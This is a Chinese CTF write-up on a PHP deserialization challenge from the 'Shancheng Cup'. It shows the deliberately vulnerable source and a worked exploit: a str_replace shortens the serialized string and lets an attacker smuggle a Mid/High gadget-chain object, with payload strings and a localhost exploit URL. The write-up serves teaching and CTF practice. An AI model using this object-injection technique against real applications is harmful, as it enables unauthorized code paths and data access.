第三届山城杯 —— 反序列化
<?php
// Shared page chrome for the writeup. The @ only hides the warning when the
// include file is missing; it does not make the include succeed.
@include('common_ui.inc');
?>
<?php
class Low{
    public $user1;
    public $user2;

    /**
     * The only class the request handler instantiates directly: both values
     * come straight from the query string (see the isset($_GET[...]) branch
     * later in this file) and are stored untouched. The handler then
     * serialize()s this object, rewrites the resulting string and
     * unserialize()s it again, so these two attacker-controlled strings are
     * exactly what ends up inside the serialized form.
     *
     * Property order (user1, then user2) matters: serialize() writes the
     * properties in declaration order, which the payload on this page relies on.
     *
     * @param mixed $a stored as $user1
     * @param mixed $b stored as $user2
     */
    function __construct($a, $b){
        $this->user2 = $b;
        $this->user1 = $a;
    }
}
class Mid{
    public $mid;

    /**
     * Runs when the object is destroyed, which also happens for objects that
     * unserialize() built from request data. Concatenating $this->mid into the
     * banner converts it to a string, so if $mid holds an object that defines
     * __toString() (High, in this file) that method runs here. This is the
     * link that turns deserialized data into a call of High::__toString().
     */
    function __destruct(){
        $payload = $this->mid;
        echo 'nice,' . $payload;
    }
}
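class High{
    public $high;

    /**
     * Final gadget of the chain: invoked implicitly whenever a High instance is
     * converted to a string (here, by Mid::__destruct concatenating its $mid).
     * Prints a marker, prints 'flag' when $high is exactly the string
     * 'flag.php', and returns a short status string.
     *
     * Fixes over the original:
     *  - the check used ==. $high comes out of unserialize() and can be any
     *    type; in PHP 8 `true == 'flag.php'` is true, so a serialized `b:1`
     *    would have passed. === pins it to the exact string.
     *  - the return used an undefined local $high (an "Undefined variable"
     *    warning and an empty value); the property $this->high was intended.
     *
     * @return string
     */
    function __toString(){
        echo 'zhixing High<br>';
        if ($this->high === 'flag.php') {
            echo 'flag';
            echo "<br/>";
        }
        return 'good job' . $this->high . '+';
    }
}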
// Meant as the declaration of the counter that pr() increments (the request
// handler below sets it to 0). PHP has no variable declarations, so on its own
// this statement does nothing useful.
$num;
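/**
 * Debug helper: prints $str on its own line, prefixed with a running counter.
 *
 * The counter is the file-level $num (mentioned above and reset to 0 in the
 * request handler). The original incremented a *local* $num instead, so every
 * call printed "1:::..." plus an undefined-variable warning; `global` binds it
 * to the shared counter as intended, and `?? 0` covers a call made before the
 * handler reset it.
 *
 * @param string $str text printed after the counter
 * @return void
 */
function pr($str){
    global $num;
    $num = ($num ?? 0) + 1;
    echo '<br>';
    echo $num . ':::' . $str;
    echo '<br><br>';
}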
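class Test{
    public $user_1;
    public $user_2;

    /**
     * Scratch class from the writeup; nothing in this file instantiates it.
     * The original constructor assigned to locals ($user_1 = new Mid;
     * $user_2 = "123") rather than to the properties, leaving both null, and
     * echoed an undefined $high (a warning and empty output). Assign the
     * properties instead and drop the stray echo.
     */
    function __construct(){
        $this->user_1 = new Mid;
        $this->user_2 = "123";
    }
}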
// Request handler. Both query parameters must be present and non-null
// (isset semantics); otherwise only the trailer below is printed.
$argA = $_GET['a'] ?? null;
$argB = $_GET['b'] ?? null;
if ($argA !== null && $argB !== null) {
    $num = 0;
    $a = new Low($argA, $argB);

    // NOTE(review): this is the vulnerable step. serialize() writes every
    // string with its byte length (s:N:"..."), and the str_replace then turns
    // each 6-byte "******" into the 2-byte "\0$" WITHOUT updating N. Every
    // occurrence inside user1 therefore leaves the parser 4 bytes short, and it
    // keeps reading into the bytes that follow (the user2 envelope and then the
    // user2 value) to satisfy N. unserialize() is called with no
    // allowed_classes restriction, so a Mid/High object smuggled in that way is
    // instantiated and Mid::__destruct starts the chain. Never unserialize()
    // request-derived data like this outside a CTF.
    $b = unserialize(str_replace('******', chr(0) . '$', serialize($a)));

    // Probes kept from the original for reference. Uncomment to compare the
    // serialized string before and after the replacement:
    // pr(serialize($a));
    // pr(str_replace("******", chr(0) . '$', serialize($a)));
    //
    // The chain built by hand, without any request parsing:
    // $test = new Mid();
    // $test->mid = new High();
    // $test->mid->high = "flag.php";
    //
    // The same chain wrapped in a Low, and as a bare Mid:
    // $test = unserialize('O:3:"Low":2:{s:5:"user1";s:4:"1111";s:5:"user2";O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}}');
    // $test = unserialize('O:3:"Mid":2:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";};}');
    // pr(serialize($test));
}
// The original else branch only held a commented-out highlight_file().
echo '<br>on<br>';
//O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}
//O:3:"Low":2:{s:5:"user1";s:3:"111";s:5:"user2";O:3:"Mid":1:{s:3:"mid";N;}}
/*http://127.0.0.1/buu/test.php
?a=1111";s:5:"user2";O:3:"Mid":2:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";};}
&b=111
*/
?>
这题感觉真的好可惜,事后看wp就差一点点就做出来了,脑子没拐过弯
代码分析
函数:
__toString() 当此类的对象被当作字符串使用时便会调用此函数（本题中是 Mid::__destruct 里的 `'nice,'.$this->mid` 字符串拼接触发的）
我们因为传参只能传给Low
所以调用链要经由 Low --> Mid（__destruct）--> High（__toString）传过去：反序列化得到的 Mid 对象销毁时会把 mid 属性拼接成字符串，从而触发 High::__toString()
而我们要调用的便是
O:3:"Mid":1:{s:3:"mid";O:4:"High":1:{s:4:"high";s:8:"flag.php";}}
的反序列化
实际操作
我们想办法把要反序列化的串放进 user2。但 serialize 之后，user1 的内容和 user2 的内容之间会多出
";s:5:"user2";s:79:"
这段"信封"（只要 user2 的长度前缀是两位数，它就是 20 个字节）。关键在于 str_replace 把 6 字节的 `******` 换成 2 字节的 `\0$`，而 user1 的长度前缀 s:N 不会跟着变小，所以每出现一次，解析器就会多读 4 个字节。因此在 user1 里放 5 个 `******`（共缩短 20 字节），正好把这 20 个字节"吃掉"，之后解析器便把 user2 开头的 `";s:5:"user2";O:3:"Mid":...` 当作 Low 对象剩余的部分来解析。
赛场上一直想把 payload 传给 user1，然后找办法让 `******` 所占的字符变多，一直没做出来，太难受了。事后看其实方向反了：这里的 str_replace 是 6 字节换 2 字节，串只会变短；可利用的点是长度前缀 s:N 没有同步变小，于是 user1 会"吞掉"后面的字节，真正的 payload 要放在 user2 里。